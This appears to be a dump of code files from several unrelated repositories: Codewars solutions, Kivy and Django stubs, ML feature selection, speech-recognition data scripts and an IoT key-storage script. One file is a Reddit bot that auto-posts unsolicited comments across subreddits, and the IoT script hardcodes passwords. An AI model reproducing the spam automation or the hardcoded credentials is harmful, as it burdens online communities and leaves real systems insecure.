label_list.append((int(b_left), int(b_upper), int(b_width), int(b_height), int(confidence1), int(c), truincation, occlusion))
new_name_str = (name_length - len(str(start_number))) * '0' + str(start_number)
with open(save_label_path+ new_name_str+".txt","w") as f:
for m in range(len(label_list)):
f.write(str(label_list[m][0])+","+str(label_list[m][1])+","+str(label_list[m][2])+","+str(label_list[m][3])+","+str(label_list[m][4])+ "," + str(label_list[m][5])+"," + str(label_list[m][6])+"," + str(label_list[m][7]) + '\r\n')
f.close()
cv2.imwrite(save_image_path + new_name_str + ".jpg", img_region)
start_number = start_number + 1
print(start_number)
return start_number
if __name__ == "__main__":
order = get_data((256, 256), 0)
# order400 = get_data(400, order)
# order600 = get_data(600, order400)
# print order600,order600-order
``` |
{
"source": "joanzhu728/Codewar",
"score": 3
} |
#### File: joanzhu728/Codewar/12_ExtractDomain.py
```python
def domain_name(url):
i = url.find("www.")
if i != -1:
url_new = url[i+4:]
else:
i = url.find("://")
if i != -1:
url_new = url[i+3:]
else:
url_new = url[0:]
domain = url_new.split(".")
return domain[0]
# return url.split("//")[-1].split("www.")[-1].split(".")[0]
import codewars_test as test
test.assert_equals(domain_name("http://google.com"), "google")
test.assert_equals(domain_name("http://google.co.jp"), "google")
test.assert_equals(domain_name("www.xakep.ru"), "xakep")
test.assert_equals(domain_name("https://youtube.com"), "youtube")
```
#### File: joanzhu728/Codewar/3_FindTheParityOutlier.py
```python
import codewars_test as test
def find_outlier(integers):
count_odd = 0
count_eve = 0
outlier = 0
if integers[0] % 2 == 0:
count_eve += 1
else:
count_odd += 1
if integers[1] % 2 == 0:
count_eve += 1
else:
count_odd += 1
if integers[2] % 2 == 0:
count_eve += 1
else:
count_odd += 1
if count_eve >= 2:
for n in integers:
if n % 2 != 0:
outlier = n
elif count_odd >= 2:
for n in integers:
if n % 2 == 0:
outlier = n
return outlier
# odds = [x for x in integers if x%2!=0]
# evens= [x for x in integers if x%2==0]
# return odds[0] if len(odds)<len(evens) else evens[0]
test.assert_equals(find_outlier([2, 4, 6, 8, 10, 3]), 3)
test.assert_equals(find_outlier([2, 4, 0, 100, 4, 11, 2602, 36]), 11)
test.assert_equals(find_outlier([160, 3, 1719, 19, 11, 13, -21]), 160)
```
#### File: joanzhu728/Codewar/4_PersistanceBugger.py
```python
import codewars_test as test
def persistence(n):
times = 0
if len(str(n)) == 1:
return times
else:
while len(str(n)) > 1:
multiple = 1
for x in str(n):
multiple *= int(x)
times += 1
n = multiple
return times
# import operator
# def persistence(n):
# i = 0
# while n>=10:
# n=reduce(operator.mul,[int(x) for x in str(n)],1)
# i+=1
# return i
test.it("Basic tests")
test.assert_equals(persistence(39), 3)
test.assert_equals(persistence(4), 0)
test.assert_equals(persistence(25), 2)
test.assert_equals(persistence(999), 4)
```
#### File: joanzhu728/Codewar/6_BitCounting.py
```python
def count_bits(n):
count = 0
bi = str(bin(n))
bi = bi[2:]
for x in bi:
if x == "1":
count += 1
return count
# return bin(n).count("1")
import codewars_test as test
@test.describe("Fixed Tests")
def fixed_tests():
@test.it("Basic Tests")
def basic_tests():
test.assert_equals(count_bits(0), 0)
test.assert_equals(count_bits(4), 1)
test.assert_equals(count_bits(7), 3)
test.assert_equals(count_bits(9), 2)
test.assert_equals(count_bits(10), 2)
```
#### File: tests/fixtures/multiple_groups.py
```python
import codewars_test as test
@test.describe("group 1")
def group_1():
@test.it("test 1")
def test_1():
test.assert_equals(1, 2)
@test.describe("group 2")
def group_2():
@test.it("test 1")
def test_1():
test.assert_equals(1, 2)
```
#### File: tests/fixtures/timeout_failing.py
```python
import codewars_test as test
@test.describe("group 1")
def group_1():
@test.timeout(0.01)
def test_1():
x = 0
while x < 10 ** 9:
x += 1
test.pass_()
``` |
{
"source": "joao0710/primeiro-repo",
"score": 2
} |
#### File: Kivy/gui/crud.py
```python
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
class Principal(BoxLayout):
pass
class Crud(App):
def build(self):
return Principal()
Crud().run()
```
#### File: gui/layouts/grid.py
```python
from kivy.app import App
from kivy.uix.gridlayout import GridLayout
class TelaApp(GridLayout):
pass
class Grid(App):
def build(self):
return TelaApp()
Grid().run()
```
#### File: Kivy/gui/teste.py
```python
from kivy.app import App
from kivy.properties import StringProperty, NumericProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.widget import Widget
class Principal(BoxLayout):
texto_principal = StringProperty('Eu sou uma label')
tamanho_texto_principal = NumericProperty(20)
def teste(self):
self.texto_principal = 'Fui clicado'
self.tamanho_texto_principal = 50
class Secundario(Widget):
pass
class Teste(App):
def build(self):
return Principal()
Teste().run()
```
#### File: pythoncollections/generators/meu_generator.py
```python
def eleva_dois(max=0):
n = 0
while n < max:
yield 2 ** n
n += 1
for i in eleva_dois(5):
print(i)
``` |
{
"source": "joao0710/tecnosul",
"score": 2
} |
#### File: base/tests/test_home.py
```python
import pytest
from django.urls import reverse
from sitetecnosul.django_assertions import assert_contains
@pytest.fixture
def resp(client):
resp = client.get(reverse('base:home'))
return resp
def test_status_code(resp):
assert resp.status_code == 200
def test_title(resp):
assert_contains(resp, '<title>Tecnosul</title>')
``` |
{
"source": "Joao16am/si",
"score": 3
} |
#### File: si/util/Feature_selection.py
```python
import numpy as np
import warnings
from copy import copy
from scipy import stats
from si.data import Dataset
class VarianceThreshold:
def __init__(self, threshold=0):
if threshold < 0:
warnings.warn('The threshold must be a non-negative value.')
threshold = 0
self.threshold = threshold
def fit(self, dataset):
# Gives variance of all X data
X = dataset.X
self._var = np.var(X, axis=0)
def transform(self, dataset, inline=False):
X, X_names = copy(dataset.X), copy(dataset._xnames)
cond = self._var > self.threshold
X_trans = X[:, cond]
idxs = [i for i in range(dataset.getNumFeatures()) if cond[i]]
x_names = [X_names[i] for i in idxs]
if inline:
dataset.X = X_trans
dataset._xnames = x_names
return dataset
else:
return Dataset(X_trans, copy(dataset.y), x_names, copy(dataset._yname))
def fit_transform(self, dataset, inline=False):
self.fit(dataset)
return self.transform(dataset, inline=inline)
class SelectKBest:
def __init__(self, k: int, score_funcs):
if score_funcs in (f_classification, f_regression):
self._func = score_funcs
if k > 0:
self.k = k
else:
warnings.warn('Invalid feature number, K must be greater than 0.')
def fit(self, dataset):
self.F, self.P = self._func(dataset)
def transform(self, dataset, inline=False):
X, X_names = copy(dataset.X), copy(dataset._xnames)
feat_select = sorted(np.argsort(self.F)[-self.k:])
x = X[:, feat_select]
x_names = [X_names[feat] for feat in feat_select]
if inline:
dataset.X = x
dataset._xnames = x_names
return dataset
else:
return Dataset(x, copy(dataset.y), x_names, copy(dataset._yname))
def fit_transform(self, dataset, inline=False):
self.fit(dataset)
return self.transform(dataset, inline=inline)
def f_classification(dataset):
X = dataset.X
y = dataset.y
args = [X[y == a, :] for a in np.unique(y)]
F, p = stats.f_oneway(*args)
return F, p
def f_regression(dataset):
from scipy.stats import f
X = dataset.X
y = dataset.y
correlation_coeficient = np.array([stats.pearsonr(X[:, i], y)[0] for i in range(X.shape[1])])
deg_of_freedom = y.size - 2
corr_coef_squared = correlation_coeficient ** 2
F = corr_coef_squared / (1 - corr_coef_squared) * deg_of_freedom
p = f.sf(F, 1, deg_of_freedom)
return F, p
``` |
{
"source": "joao29a/reddit-bots",
"score": 3
} |
#### File: reddit-bots/facts/facts.py
```python
import praw
import time
import sys
import random
#description of your bot
r = praw.Reddit(user_agent='')
#username and password
r.login('', '')
subreddits = ['funny', 'all', 'gifs', 'videos', '4chan', 'AdviceAnimals',\
'cringe', 'gaming', 'movies', 'soccer', 'crossfit', 'loseit']
f = open('ids', 'r')
replied = f.read().split('\n')
if len(replied) == 1:
replied = []
else:
replied.pop()
f.close()
def get_facts(filename):
message_facts = []
f = open(filename, 'r')
for line in f:
message = line.replace('\n','')
message_facts.append(message)
f.close()
return message_facts
random_facts = get_facts('random.txt')
soccer_facts = get_facts('soccer.txt')
games_facts = get_facts('games.txt')
fitness_facts = get_facts('fitness.txt')
movies_facts = get_facts('movies.txt')
games_list = ['gaming', 'games', 'game', 'videogame', 'starcraft']
soccer_list = ['soccer']
fitness_list = ['crossfit', 'gym', 'loseit']
movies_list = ['movie', 'movies', 'cinema']
def get_phrase(subreddit_name):
if (any(word in subreddit_name.lower() for word in soccer_list)):
return random.choice(soccer_facts)
elif (any(word in subreddit_name.lower() for word in games_list)):
return random.choice(games_facts)
elif (any(word in subreddit_name.lower() for word in fitness_list)):
return random.choice(fitness_facts)
elif (any(word in subreddit_name.lower() for word in movies_list)):
return random.choice(movies_facts)
else:
return random.choice(random_facts)
unreplied_threads = {}
replied = []
delay = 120
max_time = 3600*1
while True:
try:
subreddit = r.get_subreddit(random.choice(subreddits))
submission = subreddit.get_random_submission()
time_elapsed = int(abs(time.time() - submission.created_utc))
if submission.id not in replied and submission.id not in unreplied_threads and time_elapsed < max_time:
phrase = get_phrase(subreddit.display_name)
message = 'Have some interesting fact to lighten up your thread - \"*' + phrase + '*\"'
unreplied_threads[submission.id] = [submission, message]
ids = []
for value in unreplied_threads.values():
try:
print value[0]
value[0].add_comment(value[1])
ids.append(value[0].id)
except Exception as error:
print error
for i in ids:
del unreplied_threads[i]
f = open('ids', 'a')
f.write(i + '\n')
f.close()
replied.append(i)
time.sleep(delay)
except Exception as error:
print error
time.sleep(delay)
``` |
{
"source": "joao-aguilera-c/Binance-Algo-Trading-Bot",
"score": 2
} |
#### File: joao-aguilera-c/Binance-Algo-Trading-Bot/Get_Symbol_Info.py
```python
import datetime
import os
import pandas as pd
from binance.client import Client
import main as ws
from strategies import strutcnow
def get_file_names(dir): # 1.Get file names from directory
file_list = os.listdir(dir)
for index, item in enumerate(file_list):
file_list[index] = item[:-4]
return file_list
def TsToStrgCsvFormat(time):
t = datetime.datetime.utcfromtimestamp(time / 1000.0)
return t.strftime('%Y.%m.%d %H:%M:%S')
async def get_symbol_info(client, semanal_symbol_list, directory):
binance_client = client
# print("%s - Programa iniciado" % strutcnow())
# 2.To rename files
files = get_file_names(directory)
# print(files)
minutes_15 = pd.to_timedelta(15, unit='m')
days_60 = pd.to_timedelta(62, unit='D')
time_now = datetime.datetime.utcnow() - minutes_15
for week_symbols in semanal_symbol_list:
# print('%s - mining new values from %s' % (strutcnow(), s))
df = pd.read_csv('%s/%s.csv' % (directory, week_symbols), header=None)
last_rec_date = datetime.datetime.strptime(df[0].iloc[-1], '%Y.%m.%d %H:%M:%S') + minutes_15
# print('%s < %s' % (last_rec_date, time_now))
if last_rec_date < time_now:
"""print('%s - last mined candle was at: %s. Mining more.' % (strutcnow(),
datetime.datetime.strptime(
df[0].iloc[-1],
'%Y.%m.%d %H:%M:%S')))"""
candles_dataset = await binance_client.get_historical_klines(week_symbols,
Client.KLINE_INTERVAL_15MINUTE,
last_rec_date.strftime(
"%m/%d/%Y %H:%M:%S"),
time_now.strftime(
"%m/%d/%Y %H:%M:%S"))
if candles_dataset != []:
df = pd.DataFrame(candles_dataset)
df = df.iloc[:, :-7]
df[0] = [TsToStrgCsvFormat(time) for time in df[0]]
if ws.get_last_csv_candle_time(directory, week_symbols) != df[0].iloc[-1]:
print('%s - %s -> update from: %s to time: %s' %
(strutcnow(),
week_symbols,
ws.get_last_csv_candle_time(directory, week_symbols),
df[0].iloc[-1]))
df.to_csv('%s/%s.csv' % (directory, week_symbols), mode='a', header=False, index=False)
else:
print("{} - Algo errado com o {}, binance não foi capaz de enviar dados.".format(
strutcnow(), week_symbols))
else:
print('%s - %s já atualizado' % (strutcnow(), week_symbols))
if __name__ == "__main__":
get_symbol_info(semanal_symbol_list=['BTCUSD', 'ETHUSD'], directory=r'/Symbols', client=None)
```
#### File: joao-aguilera-c/Binance-Algo-Trading-Bot/send_email.py
```python
import smtplib
import ssl
def send_email(subject, matter):
port = 465 # For SSL
smtp_server = "smtp.gmail.com"
sender_email = "<EMAIL>" # Enter your address
receiver_email = "<EMAIL>" # Enter receiver address
password = "********"
message = 'Subject: {}\n\n{}'.format(subject, matter)
context = ssl.create_default_context()
with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, message)
``` |
{
"source": "joaoalvarenga/TensorFlowASR",
"score": 2
} |
#### File: scripts/.ipynb_checkpoints/create_portuguese_trans-checkpoint.py
```python
import argparse
import os
import glob
import random
import re
import librosa
import pandas as pd
from tqdm import tqdm
SPACES_PATTERN = re.compile('[\t\r\n\s0-9]+')
PUNCTUATION = re.compile('[!"#$%&\'()*+,-./:;<=>?@\]\[\\^_`{|}~]')
def get_duration(filename):
audio, sr = librosa.load(filename)
return librosa.get_duration(audio, sr)
def clean_text(transcript):
return PUNCTUATION.sub('', transcript)
def process_common_voice(path, tsv_file):
df = pd.read_csv(os.path.join(path, tsv_file), sep='\t')
output = []
for i, d in df.iterrows():
clip_path = os.path.join(path, os.path.join('clips', d['path']))
transcript = clean_text(d['sentence'].lower()).strip()
if len(SPACES_PATTERN.sub('', transcript)) == 0:
print(f'Skipping CV {clip_path} from {tsv_file}')
continue
output.append((f'{clip_path}.wav', transcript))
return output
def process_alcaim(alcaim_path, random_seed, max_test_people=20, max_test_utterances=200, compute_duration=False):
print('Processing alcaim')
folders = [os.path.join(alcaim_path, f.path) for f in os.scandir(alcaim_path) if f.is_dir()]
_random = random.Random(random_seed)
_random.shuffle(folders)
test_folders = folders[:max_test_people]
train, test = [], []
train_duration = 0
test_duration = 0
for folder in tqdm(folders, total=len(folders)):
is_eval_folder = folder in test_folders
test_utterances = []
for transcript_path in tqdm(glob.glob(f'{folder}/*.txt')):
with open(transcript_path) as f:
transcript = f.read().lower().strip()
audio_filename = transcript_path.replace('.txt', '.wav')
duration = 0
if compute_duration:
duration = get_duration(audio_filename)
if is_eval_folder and len(test_utterances) < max_test_utterances:
test_utterances.append((audio_filename, transcript))
test_duration += duration
continue
train.append((audio_filename, transcript))
train_duration += train_duration
test += test_utterances
return train, test, train_duration, test_duration
def process_generic(generic_path, compute_duration=False):
print('Processing generic')
folders = [os.path.join(generic_path, f.path) for f in os.scandir(generic_path) if f.is_dir()]
data = []
duration = 0
for folder in tqdm(folders, total=len(folders)):
for transcript_path in glob.glob(f'{folder}/*.txt'):
audio_filename = transcript_path.replace('.txt', '.wav')
with open(transcript_path) as f:
transcript = f.read().lower().strip()
data.append((audio_filename, transcript))
if compute_duration:
duration += get_duration(audio_filename)
return data, duration
def process_sid(sid_path, compute_duration=False):
print('Processing SID')
folders = [os.path.join(sid_path, f.path) for f in os.scandir(sid_path) if f.is_dir()]
data = []
duration = 0
for folder in tqdm(folders, total=len(folders)):
prompts = {}
with open(f'{folder}/prompts.txt') as f:
for l in f:
parts = l.strip().split('=')
idx = int(parts[0])
transcript = clean_text(' '.join(parts[1:]).lower())
if len(SPACES_PATTERN.sub('', transcript)) == 0:
continue
prompts[idx] = transcript
files = sorted(glob.glob(f'{folder}/*.wav'))
for i, audio_filename in enumerate(files):
transcript = prompts.get(i + 1)
if transcript is None:
print(f'Sid: Missing | empty {audio_filename}')
continue
data.append((audio_filename, transcript))
if compute_duration:
duration += get_duration(audio_filename)
return data, duration
def process_voxforge(voxforge_path, compute_duration):
print('Processing VoxForge')
folders = [os.path.join(voxforge_path, f.path) for f in os.scandir(voxforge_path) if f.is_dir()]
train = []
duration = 0
for folder in tqdm(folders, total=len(folders)):
has_etc = os.path.exists(os.path.join(folder, 'etc'))
prompt_file = os.path.join(folder, f'{"etc/" if has_etc else ""}PROMPTS')
prompts = {}
path_prefix = f'{folder}/{"wav/" if has_etc else ""}'
with open(prompt_file) as f:
for l in f:
parts = l.strip().split(' ')
file_index = parts[0].split('/')[-1]
transcript = ' '.join(parts[1:]).lower()
if len(SPACES_PATTERN.sub('', transcript)) == 0:
continue
prompts[f'{path_prefix}{file_index}.wav'] = ' '.join(parts[1:]).lower()
for audio_filename in glob.glob(f'{path_prefix}/*.wav'):
transcript = prompts.get(audio_filename)
if transcript is None:
print(f'Voxforge: Missing | empty {audio_filename}')
continue
train.append((audio_filename, transcript))
if compute_duration:
duration += get_duration(audio_filename)
return train, duration
def process_coral(coral_path, compute_duration):
print('Processing C-ORAL')
folders = [os.path.join(coral_path, f.path) for f in os.scandir(coral_path) if f.is_dir()]
data = []
duration = 0
for folder in tqdm(folders, total=len(folders)):
for transcript_path in glob.glob(f'{folder}/*.txt'):
audio_filename = transcript_path.replace('.txt', '.wav')
with open(transcript_path) as f:
transcript = clean_text(f.read().lower().strip())
data.append((audio_filename, transcript))
if compute_duration:
duration += get_duration(audio_filename)
return data, duration
def write_output_file(path, files):
output = ['PATH\tDURATION\tTRANSCRIPT']
output += ['\t'.join([file[0], '0', file[1]]) for file in files]
with open(path, 'w') as f:
f.write('\n'.join(output))
def write_lm_file(path, files):
output = []
for audio, transcript in tqdm(files, total=len(files)):
with open(transcript) as f:
output.append(f.read().strip())
with open(path, 'w') as f:
f.write('\n'.join(output))
def generate_datasets(alcaim_path, sid_path, voxforge_path, lapsbm_val_path, common_voice_path, random_seed, output_train, output_eval,
output_test, compute_duration, max_train, max_eval, coral_path):
train, eval, test = [], [], []
train_duration = 0
eval_duration = 0
test_duration = 0
if alcaim_path:
_train, _test, _train_duration, _test_duration = process_alcaim(alcaim_path, random_seed,
compute_duration=compute_duration)
train += _train
test += _test
train_duration += _train_duration
test_duration += _test_duration
if sid_path:
_train, _train_duration = process_sid(sid_path, compute_duration=compute_duration)
train += _train
train_duration += _train_duration
if lapsbm_val_path:
_eval, _eval_duration = process_generic(lapsbm_val_path, compute_duration=compute_duration)
eval += _eval
eval_duration += eval_duration
if voxforge_path:
_train, _train_duration = process_voxforge(voxforge_path, compute_duration=compute_duration)
train += _train
train_duration += _train_duration
if common_voice_path:
train += process_common_voice(common_voice_path, 'train.tsv')
train += process_common_voice(common_voice_path, 'dev.tsv')
test += process_common_voice(common_voice_path, 'test.tsv')
if coral_path:
_train, _train_duration = process_coral(coral_path, compute_duration)
train += _train
print(f'Total {len(train)} train files, eval {len(eval)}, {len(test)} test files')
if max_train > 0:
train = train[:max_train]
if max_eval > 0:
eval = eval[:max_eval]
write_output_file(output_train, train)
write_output_file(output_eval, eval)
write_output_file(output_test, test)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Generate datasets split")
parser.add_argument('--alcaim_path', type=str, help="CETUC dataset path")
parser.add_argument('--sid_path', type=str, help="SID dataset path")
parser.add_argument('--voxforge_path', type=str, help="SID dataset path")
parser.add_argument('--lapsbm_val_path', type=str, help="LapsBM val dataset path")
parser.add_argument('--common_voice_path', type=str, help="Common Voice dataset path")
parser.add_argument('--coral_path', type=str, help="C-ORAL dataset path")
parser.add_argument('--random_seed', type=int, default=42, help="Random seed")
parser.add_argument('--output_train', type=str, required=True, help='Output path file containing train files paths')
parser.add_argument('--output_eval', type=str, required=True, help='Output path file containing eval files paths')
parser.add_argument('--output_test', type=str, required=True, help='Output path file containing test files paths')
parser.add_argument('--compute_duration', action='store_true')
parser.add_argument('--max_train', type=int, default=-1, help='Max train files')
parser.add_argument('--max_eval', type=int, default=-1, help='Max eval files')
args = parser.parse_args()
kwargs = vars(args)
print('-' * 20)
print('Generating datasets with args: ')
for arg in vars(args):
print(f'{arg}: {getattr(args, arg)}')
print('-' * 20)
generate_datasets(**kwargs)
```
#### File: models/layers/positional_encoding.py
```python
import tensorflow as tf
from ...utils.utils import shape_list
class PositionalEncoding(tf.keras.layers.Layer):
def build(self, input_shape):
dmodel = input_shape[-1]
assert dmodel % 2 == 0, f"Input last dim must be even: {dmodel}"
@staticmethod
def encode(max_len, dmodel):
pos = tf.expand_dims(tf.range(max_len - 1, -1, -1.0, dtype=tf.float32), axis=1)
index = tf.expand_dims(tf.range(0, dmodel, dtype=tf.float32), axis=0)
pe = pos * (1 / tf.pow(10000.0, (2 * (index // 2)) / dmodel))
# Sin cos will be [max_len, size // 2]
# we add 0 between numbers by using padding and reshape
sin = tf.pad(tf.expand_dims(tf.sin(pe[:, 0::2]), -1),
[[0, 0], [0, 0], [0, 1]], mode="CONSTANT", constant_values=0)
sin = tf.reshape(sin, [max_len, dmodel])
cos = tf.pad(tf.expand_dims(tf.cos(pe[:, 1::2]), -1),
[[0, 0], [0, 0], [1, 0]], mode="CONSTANT", constant_values=0)
cos = tf.reshape(cos, [max_len, dmodel])
# Then add sin and cos, which results in [time, size]
pe = tf.add(sin, cos)
return tf.expand_dims(pe, axis=0) # [1, time, size]
def call(self, inputs, **kwargs):
# inputs shape [B, T, V]
_, max_len, dmodel = shape_list(inputs)
pe = self.encode(max_len, dmodel)
return tf.cast(pe, dtype=inputs.dtype)
def get_config(self):
conf = super(PositionalEncoding, self).get_config()
return conf
class PositionalEncodingConcat(tf.keras.layers.Layer):
def build(self, input_shape):
dmodel = input_shape[-1]
assert dmodel % 2 == 0, f"Input last dim must be even: {dmodel}"
@staticmethod
def encode(max_len, dmodel):
pos = tf.range(max_len - 1, -1, -1.0, dtype=tf.float32)
index = tf.range(0, dmodel, 2.0, dtype=tf.float32)
index = 1 / tf.pow(10000.0, (index / dmodel))
sinusoid = tf.einsum("i,j->ij", pos, index)
pos = tf.concat([tf.sin(sinusoid), tf.cos(sinusoid)], axis=-1)
return tf.expand_dims(pos, axis=0)
def call(self, inputs, **kwargs):
# inputs shape [B, T, V]
_, max_len, dmodel = shape_list(inputs)
pe = self.encode(max_len, dmodel)
return tf.cast(pe, dtype=inputs.dtype)
def get_config(self):
conf = super(PositionalEncoding, self).get_config()
return conf
```
#### File: tensorflow_asr/utils/metrics.py
```python
import numpy as np
import tensorflow as tf
from nltk.metrics import distance
from .utils import bytes_to_string
def wer(decode: np.ndarray, target: np.ndarray) -> (tf.Tensor, tf.Tensor):
"""Word Error Rate
Args:
decode (np.ndarray): array of prediction texts
target (np.ndarray): array of groundtruth texts
Returns:
tuple: a tuple of tf.Tensor of (edit distances, number of words) of each text
"""
decode = bytes_to_string(decode)
target = bytes_to_string(target)
dis = 0.0
length = 0.0
for dec, tar in zip(decode, target):
words = set(dec.split() + tar.split())
word2char = dict(zip(words, range(len(words))))
new_decode = [chr(word2char[w]) for w in dec.split()]
new_target = [chr(word2char[w]) for w in tar.split()]
dis += distance.edit_distance(''.join(new_decode), ''.join(new_target))
length += len(tar.split())
return tf.convert_to_tensor(dis, tf.float32), tf.convert_to_tensor(length, tf.float32)
def cer(decode: np.ndarray, target: np.ndarray) -> (tf.Tensor, tf.Tensor):
"""Character Error Rate
Args:
decode (np.ndarray): array of prediction texts
target (np.ndarray): array of groundtruth texts
Returns:
tuple: a tuple of tf.Tensor of (edit distances, number of characters) of each text
"""
decode = bytes_to_string(decode)
target = bytes_to_string(target)
dis = 0
length = 0
for dec, tar in zip(decode, target):
dis += distance.edit_distance(dec, tar)
length += len(tar)
return tf.convert_to_tensor(dis, tf.float32), tf.convert_to_tensor(length, tf.float32)
class ErrorRate(tf.keras.metrics.Metric):
""" Metric for WER and CER """
def __init__(self, func, name="error_rate", **kwargs):
super(ErrorRate, self).__init__(name=name, **kwargs)
self.numerator = self.add_weight(name=f"{name}_numerator", initializer="zeros")
self.denominator = self.add_weight(name=f"{name}_denominator", initializer="zeros")
self.func = func
def update_state(self, decode: tf.Tensor, target: tf.Tensor):
n, d = tf.numpy_function(self.func, inp=[decode, target], Tout=[tf.float32, tf.float32])
self.numerator.assign_add(n)
self.denominator.assign_add(d)
def result(self):
if self.denominator == 0.0: return 0.0
return (self.numerator / self.denominator) * 100
``` |
{
"source": "joaoamaral28/iot-decentralized-token-auth",
"score": 3
} |
#### File: src/A3C_DD/storage.py
```python
import pymongo
import os
import datetime
from a3c_dd_security_module import *
db_client_name = "IOT_A3C_DD_DB"
collection_name = "crypto_info"
col_dd = "dd_info"
# generate public and private keys of the server
# only used to create the .pem files which already exist on the project folder
def generateServerKeyPair(password):
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
priv_key = rsa.generate_private_key(public_exponent=655537,key_size=2048,backend=default_backend())
pub_key = priv_key.public_key()
pub_key = pub_key.public_bytes(encoding=serialization.Encoding.PEM,format=serialization.PublicFormat.SubjectPublicKeyInfo)
priv_pem = priv_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8,encryption_algorithm=serialization.BestAvailableEncryption(password))
try:
with open("private_key_server.pem","w") as file:
file.write(priv_pem.decode())
with open("public_key_server.pem","w") as file:
file.write(pub_key.decode())
except Exception as exc :
print("Error occurred while writing key on file")
print(exc)
return
return
def main():
# db init
db_client = pymongo.MongoClient("mongodb://localhost:27017/")
db = db_client[db_client_name]
col = db[collection_name]
# col.drop()
# password hash+salt storage
password = b"<PASSWORD>!\"#$%&/()="
salt = os.urandom(16)
key = PBKDF2(password, salt)
d = {"key":key , "salt":salt }
x = col.insert_one(d)
for d in col.find({}):
print(d['key'])
print(d['salt'])
if __name__ == "__main__":
#main()
#generateServerKeyPair(b"123456789!\"#$%&/()=")
# ADD DD TO DB
db_client = pymongo.MongoClient("mongodb://localhost:27017/")
db = db_client[db_client_name]
col = db[col_dd]
#col.drop()
info_dd_temp = {
"uuid" : "f17a1fe9d42b711c463cdad54e5db6f0",
"public_key": "-----BEGIN PUBLIC KEY-----\<KEY>
-----END PUBLIC KEY-----\n",
"name" : "temperature sensor",
"manufacturer" : "Wemos LOLIND32",
"api" : [ "readValue", "calibrateSensor", "setUnits"],
}
info_dd_light = {
"uuid" : "<KEY>",
"public_key": "-----<KEY>
-----END PUBLIC KEY-----\n",
"name" : "light actuator",
"manufacturer" : "Wemos LOLIND32",
"api" : ["turnOn", "turnOff", "getStatus", "increaseBrightness", "decreaseBrightness"],
}
# insert document
x = col.insert_one(info_dd_temp)
y = col.insert_one(info_dd_light)
################################################################
#################### CLIENT REQUEST ############################
################################################################
"""
client_pub_key = "-----<KEY>
-----END PUBLIC KEY-----"
encoded_client_pub_key = base64.b64encode(client_pub_key.encode())
client_uuid = digestSHA256(client_pub_key.encode())
request_id = "1"
device_id = "1"
#date = datetime.datetime.now()
date = "2019-05-16 17:02:39.082262"
document = encoded_client_pub_key + bytes(client_uuid.hex(),'utf-8') + bytes(request_id,'utf-8') + bytes(device_id,'utf-8') + bytes(date,'utf-8')
print(document)
print()
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
with open('../Client/private_client.pem', "rb") as key_file:
priv_key = serialization.load_pem_private_key(
key_file.read(),
password=<PASSWORD>,
backend=default_backend())
key_file.close()
signature = signRSA(priv_key, document)
encoded_signature = base64.b64encode(signature)
#print(encoded_signature)
print("Request ID: {}".format(request_id))
print("Client ID: {}".format(client_uuid.hex()))
print("Client key: {}".format(encoded_client_pub_key))
print("Device ID: {}".format(device_id))
print("Date: {}".format(date))
print("Signature: {}".format(encoded_signature))
"""
################################################################
################# ADD GW TO DATABASE ###########################
################################################################
"""
db_client = pymongo.MongoClient("mongodb://localhost:27017/")
db = db_client[db_client_name]
col = db["smarthome"]
info_gw1 = {
"uuid" : "38e998af01b5c8d8287a817211e5e52fb23a3e3bb031c0c1437746d9e148bd17",
"device_type" : "gateway",
"public_key": "<KEY>
"bt_addr" : "B8:27:EB:3E:C9:4B",
"slave_devices" : [
{ "uuid" : "8c408678593fff6c916f4177408633c1801fdc3bce650f83edbf43e6c06d79de" } #, "ble_addr": "30:AE:A4:EA:CA:A2" }
]
}
"""
# insert document
#x = col.insert_one(info_gw1)
# check if gateway exsits
"""
gw_id = "38e998af01b5c8d8287a817211e5e52fb23a3e3bb031c0c1437746d9e148bd17"
if(not col.count_documents({"uuid": gw_id})):
print("# Invalid registration request!\n## Received gateway ID doest not exists in local database!")
# self.write("....")
#return
print("Gateway ID valid and registered in local database")
doc = col.find({"uuid" : gw_id}).limit(1)[0]
slave_devices = doc['slave_devices']
# get info from gw slave devices
device_list = []
device_info = {}
for device in slave_devices:
device_uuid = device['uuid']
if(not col.count_documents({"uuid": device_uuid})):
print("# Error: IoT slave device ID {}, extracted from gateway document with ID {} not found in collection:{}, document{}!\n## Registration process aborted!".format(device_uuid,gw_id,"smarthome","devices_info"))
break
# self.write("....")
#return
doc_device = col.find({"uuid" : device_uuid}).limit(1)[0]
#print(doc_device)
if(doc_device['device_type'] != "host_device"):
print("# Error: Mismatch between device type.\n## Device type must be \"host_device\" but \"{}\" was found instead".format(doc_device['device_type']))
break
# self.write("...")
#return
if(doc_device['master_gateway'] != gw_id):
print("# Error: Mismatch between slave device and master gateway id\n## Master gateway id {} expected, found id {} instead".format(gw_id,doc_device['master_gateway']))
break
# self.write("...")
#return
device_info['uuid'] = device_uuid
device_info['bt_addr'] = doc_device['bt_addr']
device_info['driver_list'] = doc_device['driver_list']
device_list.append(device_info)
response_code = "OK"
response = {"code" : "OK", "device_record" : device_list}
print(device_info)
#signature = signRSA(server_priv_key, response)
print("All device information extracted successfully!")
print("Gateway registered successfully ")
#self.write(str({"response":response, "signature":signature}))
#return
"""
"""
info_esp1 = {
"uuid": "8c408678593fff6c916f4177408633c1801fdc3bce650f83edbf43e6c06d79de",
"device_type": "host_device",
"public_key": "<KEY>
"bt_addr" : "30:AE:A4:EA:CA:A2",
"master_gateway" : "<KEY>",
"driver_list" : [
{ "id": 1,
"type" : "sensor",
"subtype" : "temperature",
"actions": [
"readValue()",
"calibrateSensor()"
],
"description" : {
"Measurement units" : "Celcius",
"Operational temperature" : "[-10,50]",
"Model" : "model xzy",
"Manufacturer" : "abcdefg"
}
},
{ "id": 2,
"type" : "actuator",
"subtype" : "lightbulb",
"actions" : [
"turnOn()",
"turnOff()",
"increaseBrightness()",
"decreaseBrightness()"
],
"description" : {
"Measurement units" : "Celcius",
"Operational range" : "[-10,50]",
"Model" : "model yrz",
"Manufacturer" : "gfdsad"
}
}
]
}
